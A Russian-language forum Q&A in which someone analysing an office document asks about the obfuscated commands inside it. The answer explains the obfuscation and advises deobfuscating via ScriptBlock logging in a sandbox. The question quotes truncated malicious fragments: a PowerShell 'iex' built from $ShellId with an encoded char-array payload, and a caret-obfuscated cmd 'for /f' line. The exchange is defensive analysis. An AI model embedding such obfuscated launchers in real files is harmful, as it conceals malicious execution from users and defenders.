Команды оболочки или bash в офисных файлах

Question

При анализе файла документа я вижу некоторые команды Power Shell, такие как

Execute Command - params "PowersHeLL  & ( $sHELlId[1]+$ShEllID[13]+'X')( [StRinG]::joiN( '' ,([CHaR[]] (62 , 116, 109 ,84 ,119 , 86,88 ,58,39, 58 , 116 ,127 ,109 ,55, 117,120,112, 127 ,121,110,58 ,104,123 , 116,126, 117,119, 33 ,62 , 116 ,78 ,116 , 86, 77 ,95 ,58, 39 ,58 , 116 ,127 , 109

или

Run - params [Function FqLHmmC ([vwPoLiLXwz]): 7 statement(s), 'cmd /c ^f^O^r ; ;  /^F , ;  "   tokens=  2   delims=EFHMN" ; %^h ;  ; ^iN  ; ( , \' ;  ft^^YpE , ; ^| ;  fiNd^^str , H^^C \' ; ; ) ; ^do  , ;  %^h;  ;  n8ZAmId/vs~*t^@^Y)PUA^     ; ;  h0XobFu/^C  "  , , (   (s^ET  ^  ^`  ^ =E=6^l2u^\\^h^s\'^y4D^w^XoWJNzL@^b^anGx, ^Ri^{f.P1+Fcme^3^v^0/jB^(krd;^}Z^)-^:tM^Sg^$^pOC)

Как они интерпретируются?Например, я думаю, 62 , 116, 109 ,84 - десятичные значения.Однако преобразование их в ascii не имеет смысла.Второй, например, fiNd^^str , H^^C \' ; ; ) ; ^do звучит как скрипт bash.Но это не имеет смысла.

Значит ли это, что они запутаны?или запутывание это что то другое?!

Answer 1

Как они интерпретируются?

Ну, они анализируются и интерпретируются, как и любой другой код PowerShell.Это просто сложнее читать для людей.[char]116 это просто так.Вы можете ввести его в PowerShell и узнать, что это такое (ascii код для t).

Означает ли это, что они запутаны?

Да.

Самый простой способ деобфускать - запустить включенную запись в ScriptBlock .Журнал событий покажет, что на самом деле выполняется.Поскольку вы не знаете, что собираетесь выполнить: делайте это только в изолированной среде с песочницей!